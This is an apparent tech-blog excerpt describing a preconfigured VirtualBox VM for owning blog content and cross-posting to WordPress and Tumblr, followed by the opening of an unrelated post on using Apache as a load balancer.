You’ll need to configure VirtualBox and point it at the shared folders that will host your blog content, then install WordPress on your virtual web server, and set up any cross-posting capabilities you might want. To make the process super-easy, Maymay includes a pre-configured “Bring Your Own Content” VM for Virtualbox to get you started that supports Tumblr and WordPress out of the box. Hit the link below to see the whole post and a full walkthrough.

Update: Maymay clarified that the goal of the project is the inverse of how I originally categorized it – the BYOC VM isn’t designed to replace a web host, just serve as a space where you pull the strings and own the content, and then push out to the rest of the web. The post above has been updated to reflect this.

How to configure Apache to serve as load balancer between 2 or more Webservers on Linux / Apache basic cluster

Any admin somehow involved in sphere of UNIX Webhosting knows Apache pretty well. I’ve personally used Apache for about 10 years now and until now I always used it as a single installation on a Linux. Always so far whenever the requirements for more…
